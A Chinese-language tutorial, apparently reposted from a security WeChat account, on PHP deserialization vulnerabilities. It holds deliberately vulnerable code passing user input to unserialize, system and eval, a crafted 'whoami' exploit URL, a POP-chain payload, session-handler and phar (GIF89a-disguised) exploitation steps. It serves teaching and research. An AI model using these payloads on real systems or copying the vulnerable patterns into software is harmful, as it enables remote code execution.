什么是反序列化
php反序列化中序列化:对象信息转化为字符串反序列化:字符串转化为对象信息作用:便于传输和存储php序列化简述
<?phpclass S{public $test="e0mlja";var $url;function setUrl($par){$this->url = $par;}}$s=new S();$s->setUrl("http://123.com");echo serialize($s);?>
上述的example中,打印一下结果如下O:1:"S":2:{s:4:"test";s:6:"e0mlja";s:3:"url";s:14:"http://123.com";}分析一下代表的意思O:对象1:数量,代表1个"S":这个对象(类)的名称,为s2:对象里面有两个变量,内部的变量用{}包围s:数据类型,这里为string4:长度,代表4个长度test:变量的名字s:数据类型6:变量的值的长度e0mlja:变量的值的值后续的url可以依次类推
php修饰符影响
<?phpclass A{private $test = "whoami1";protected $test1 = "whoami2";public $test2 = "whoami3";}$a=new A();echo serialize($a);?>private 前面多了一个A,也就是多了一个类名,长度为7,其实构造方式为%00类名%00成员名protected 前面多了一个* 长度为8 构造方式为%00*%00成员名
php反序列化简述
<?phpclass S{public $test="e0mlja";var $url;function setUrl($par){$this->url = $par;}}$s=new S();$s->setUrl("http://123.com");echo serialize($s);$u=unserialize('O:1:"S":2:{s:4:"test";s:6:"e0mlja";s:3:"url";s:14:"http://123.com";}');var_dump($u);?>
看下面的结果,能够看到unserialize是还原了序列化的字符串
php中的反序列化漏洞
通过控制php中的魔术方法,传入构造的恶意反序列化后的字符串,通过魔术方法触发反序列化漏洞,执行我们的恶意代码。注意反序列化构造的类名必须和源码中的一致,不能新生成一个类名。漏洞前提:1.unserialize的参数可控2.有可以利用的魔术方法常用魔术方法
__wakeup() 使用unserialize时触发__sleep() 使用serialize时触发__destruct() 对象被销毁时触发__call() 在对象上下文中调用不可访问的方法时触发__callStatic() 在静态上下文中调用不可访问的方法时触发__get() 用于从不可访问的属性读取数据__set() 用于将数据写入不可访问的属性__isset() 在不可访问的属性上调用isset()或empty()触发__unset() 在不可访问的属性上使用unset()时触发__toString() 当对象被当作字符串输出的时候自动触发__invoke() 当脚本尝试将对象调用为函数时触发简单的反序列化漏洞
<?phpclass A{var $test = "demo";function __destruct(){@system($this->test);}}$test = $_GET['test'];$test_unser = unserialize($test);?>利用过程
1.生成反序列化字符串<?phpclass A{var $test = "whoami";}$a=new A();echo serialize($a);?>2.发送数据http://127.0.0.1/1.php?test=O:1:%22A%22:1:{s:4:%22test%22;s:6:%22whoami%22;}3.获取结果
中等复杂的反序列化利用
<?phpclass A{public $target;function __construct(){$this->target = new B;}function __destruct(){$this->target->action();}}class B{function action(){echo "action B";}}class C{public $test;function action(){echo "action A";eval($this->test);}}unserialize($_GET['test']);?>利用分析
(1)反序列化的传参为test,test可以传入序列化后的字符串(2)调用的结果在于classC中的eval方法造成代码执行(3)执行eval方法需要调用action()方法(非自动调用所以需要找触发点),action()方法的调用可以再ClassA的__destruct中调用(4)根据分析结果写出来一个利用的pop链子
<?phpclass A{public $target;function __destruct(){$this->target = new C();$this->target->action();}}class C{public $test="phpinfo();";function action(){@eval($this->test);}}$a=new A();echo serialize($a);?>
session反序列化
参考https://xz.aliyun.com/t/6753代码1
<?phperror_reporting(0);ini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['session'] = $_GET['session'];?>
此文件的作用主要是设置session的值,可以通过session get方式传参设置代码2
<?phperror_reporting(0);ini_set('session.serialize_handler','php');session_start();class e0m{public $name = 'e0m';function __wakeup(){echo "Who are you?";}function __destruct(){echo '<br>'.$this->name;}}$str = new e0m();echo serialize($str);?>
此文件的作用主要是验证不同存储方式的session影响利用过程
访问session1,获取session,session的结果可以再php.ini文件中查看配置的路径访问hello.php,获取反序列化的结果修改session文件,将需要反序列化的结果补充到session中,然后访问hello.php
利用的话,可以看一下这个文章https://cloud.tencent.com/developer/article/2035863phar
特定于php的压缩文件,类似于java的jar,不经过解压就可以直接访问要求php.ini中设置为phar.readonly=Offphp version>=5.3.0构造一个phar文件
<?phpclass e0mObject {}@unlink("phar.phar");$phar = new Phar("phar.phar");$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");$o = new e0mObject();$phar->setMetadata($o);$phar->addFromString("e0m.txt", "test");$phar->stopBuffering();?>验证反序列化漏洞存在,调用file_get_contents时触发了反序列化,自动调用了__destruct方法。
<?phpclass e0mObject {public function __destruct() {echo 'success';}}$filename = 'phar://phar.phar/e0m.txt';file_get_contents($filename);?>
由于phar文件的php识别只验证了__HALT_COMPILER();?>,可以通过如下$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");将文件修改为php格式,然后利用phar伪协议进行进一步的利用。寻找反序列化漏洞
(1)寻找参数可控的unserialize()触发点(2)寻找合适的漏洞点,比如存在eval,file等相关操作的魔术方法(3)通过魔术方法一系列的调用,构造出一条调用栈(4)根据调用栈写出payload总结
php的反序列化还是需要多动手,多梳理一下流程,和java有相似之处,但是寻找调用点还需要经验等。
原文始发于微信公众号(e0m安全屋):php反序列化初探
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论